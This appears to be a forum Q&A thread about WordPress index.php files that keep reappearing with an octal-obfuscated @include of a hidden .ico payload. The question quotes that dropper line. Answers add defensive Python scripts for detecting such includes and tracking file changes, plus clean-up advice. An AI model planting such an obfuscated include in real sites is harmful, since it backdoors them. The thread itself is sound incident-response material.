Reputation: 51
For the past 6 days I have been finding index.php files all over my WordPress install with the following lines of code and similar.
/*371bd*/
@include "\057hom\145/tm\142m20\0616/p\165bli\143_ht\155l/V\151deo\163/ba\143kwp\165p-9\0622c4\070-te\155p/a\0622e4\143b96\1468d0\066a49\145521\143cfa\066881\146fe/\0568c7\1453c7\067.ic\157";
/*371bd*/
Every day I completely remove all the index.php files by doing a scan and I also use Wordfence to find malicious code and remove it.
Once clean, I come back the next day and everything is back! How do I stop this once and for all?
Upvotes: 3
Views: 5284
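The dropped file above hides its include target behind PHP octal string escapes so that a plain grep for the path finds nothing. The following scanner is an added example, not code from the question or any answer: it decodes those escapes without executing anything, flags include/require statements whose argument is escape-obfuscated or points at a non-PHP file (the .ico target here), and walks a tree reporting every PHP file that contains one. The sample injected file is constructed from the marker block quoted in the question; the directory layout in demo_scan() is a throwaway temp tree built for the demonstration.

```python
import os
import re
import tempfile

# Constructed sample file: the marker block quoted in the question, wrapped in
# a PHP open tag so it looks like one of the dropped index.php files.
SAMPLE_INJECTED = (
    "<?php\n/*371bd*/\n@include "
    + r'"\057hom\145/tm\142m20\0616/p\165bli\143_ht\155l/V\151deo\163/ba\143kwp'
    + r'\165p-9\0622c4\070-te\155p/a\0622e4\143b96\1468d0\066a49\145521\143cfa'
    + r'\066881\146fe/\0568c7\1453c7\067.ic\157"'
    + ";\n/*371bd*/\n"
)

# Constructed benign file for contrast: an ordinary bootstrap include.
SAMPLE_CLEAN = '<?php\nrequire_once "wp-load.php";\n'

# PHP double-quoted string escapes the dropper uses to hide the path:
# octal \ooo (one to three digits) and hex \xhh.
ESCAPE_RE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3})")

# An include/require whose argument is a double-quoted literal.
INCLUDE_RE = re.compile(
    r'@?\s*(?:include|require)(?:_once)?\s*\(?\s*"((?:\\.|[^"\\])*)"'
)


def decode_php_escapes(literal):
    """Resolve \\ooo and \\xhh escapes as PHP would inside "...", without running it."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == "x":
            return chr(int(tok[1:], 16))
        return chr(int(tok, 8))
    return ESCAPE_RE.sub(repl, literal)


def find_suspicious_includes(php_source, min_escapes=3):
    """Return include targets that are escape-obfuscated or point at a non-PHP file."""
    hits = []
    for m in INCLUDE_RE.finditer(php_source):
        raw = m.group(1)
        escapes = len(ESCAPE_RE.findall(raw))
        decoded = decode_php_escapes(raw)
        ext = os.path.splitext(decoded)[1].lower()
        # Legitimate code has no reason to octal-encode a path, and including
        # an .ico (or any other non-PHP file) is the classic trick seen here.
        if escapes >= min_escapes or ext not in (".php", ".inc"):
            hits.append({"raw": raw, "decoded": decoded, "escapes": escapes})
    return hits


def scan_tree(root):
    """Walk a WordPress tree and report every PHP file with a suspicious include."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            for hit in find_suspicious_includes(src):
                findings.append({"file": path, **hit})
    return findings


def demo_scan():
    """Build a throwaway tree with one injected and one clean file, then scan it."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    with open(os.path.join(root, "wp-content", "uploads", "index.php"), "w") as fh:
        fh.write(SAMPLE_INJECTED)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write(SAMPLE_CLEAN)
    return scan_tree(root)


if __name__ == "__main__":
    for f in demo_scan():
        print(f"{f['file']}: include of {f['decoded']} ({f['escapes']} escapes)")
```

Run it against the real install with scan_tree("/path/to/wordpress") instead of the demo tree. The decoded target (a hidden .ico file under a plugin temp directory in the question's sample) tells you where the actual payload lives; removing only the index.php droppers while that file stays in place is why it keeps coming back.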
Reputation: 11
Today I resurrected two websites that were offline, infected with UBH (United Bangladeshi Hackers malware). It was not a very simple task and requires command-line knowledge.
First, check the consistency of the core WordPress files; the wp-cli tool is the way to do that.
Run the command:
wp core verify-checksums --allow-root
Success: WordPress installation verifies against checksums.
Upvotes: 1
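wp core verify-checksums only covers the core files, and a passing result (as in the answer above) says nothing about wp-content, where themes, plugins and uploads live and where droppers like the one in the question usually land. The script below is an added example, not part of this answer or of wp-cli: it takes a SHA-256 manifest of wp-content after a clean-up, and on the next run lists exactly which files appeared, changed or vanished, so the overnight reinfection shows what came back and where. The tree and file contents in demo_reinfection() are constructed for the demonstration.

```python
import hashlib
import json
import os
import sys
import tempfile

# Subtrees the core checksum check does not cover.
DEFAULT_SUBTREES = ("wp-content",)


def sha256_file(path):
    """Hash one file in chunks so large uploads do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, subtrees=DEFAULT_SUBTREES):
    """Map every file under the chosen subtrees (path relative to root) to its SHA-256."""
    manifest = {}
    for sub in subtrees:
        for dirpath, _dirs, files in os.walk(os.path.join(root, sub)):
            for name in files:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                manifest[rel] = sha256_file(full)
    return manifest


def diff_manifests(baseline, current):
    """Return files that appeared, changed or vanished since the baseline."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return {"added": added, "modified": modified, "removed": removed}


def save_manifest(manifest, path):
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def demo_reinfection():
    """Constructed scenario: baseline a clean tree, simulate the overnight change
    (a dropped index.php plus a tampered plugin file), then diff."""
    root = tempfile.mkdtemp(prefix="wp-manifest-demo-")
    plugin_dir = os.path.join(root, "wp-content", "plugins", "example-plugin")
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(plugin_dir)
    os.makedirs(uploads)
    with open(os.path.join(plugin_dir, "plugin.php"), "w") as fh:
        fh.write("<?php\n// clean plugin file\n")
    baseline = build_manifest(root)
    # Simulated reinfection: new dropper file and an appended line in the plugin.
    with open(os.path.join(uploads, "index.php"), "w") as fh:
        fh.write("<?php\n/*371bd*/\n@include \"...\";\n/*371bd*/\n")
    with open(os.path.join(plugin_dir, "plugin.php"), "a") as fh:
        fh.write("/* appended by the dropper */\n")
    return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    # Usage: python wp_manifest.py baseline <wp-root> <manifest.json>
    #        python wp_manifest.py check    <wp-root> <manifest.json>
    if len(sys.argv) != 4:
        for kind, paths in demo_reinfection().items():
            print(kind, paths)
        sys.exit(0)
    mode, root, store = sys.argv[1:4]
    if mode == "baseline":
        save_manifest(build_manifest(root), store)
    else:
        for kind, paths in diff_manifests(load_manifest(store), build_manifest(root)).items():
            for p in paths:
                print(f"{kind}: {p}")
```

Keep the manifest file outside the web root (and ideally off the server), since anything writable by the web server process can be edited by the same code that writes the droppers; a baseline the attacker can update is no baseline.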
Reputation: 5455
Your website has been compromised - it's a typical attack for weak Wordpress websites.
First and foremost:
Do NOT use 'free' paid themes you download off of sketchy websites. Either use a real free theme from the Wordpress themes page or pay for a real premium theme from a reputable vendor.
Do NOT use 'free' paid plugins you download off of sketchy websites. Either use a legitimate plugin or pay for a premium one from a reputable vendor.
How to stop it once and for all?
1) If you're using a 'free' (paid) theme from some dodgy website, just don't. They typically contain back doors for injection such as this.
Either use a legitimate free theme or pay for a premium one.
2) Change your passwords from your email up to your web hosting. That includes your cPanel and FTP if you're using that.
3) Completely wipe ALL files off your server/public_html folder - start fresh.
4) Delete all MySQL databases.
5) Reinstall WordPress using a legitimate theme and make sure you don't use 'admin' or 'administrator' as the username; set it to something else and set a strong password.
6) After a complete reinstallation, use a security plugin such as WP Cerber (excellent plugin) and change the default login URL from /wp-login to something custom (WP Cerber has this functionality).
7) Don't use any of the same usernames/passwords you used previously for anything. A password manager such as LastPass could come in handy here; it will generate and remember very strong passwords for you.
8) Extra step: If you're familiar with the command line, use WPScan to test your website for vulnerabilities. It's a tool designed to do just that... Be sure you only use it against your own websites though, as it essentially looks for ways to 'get in' and compromise the site, and it may not be strictly legal to do it at will against other people's websites.
Upvotes: 4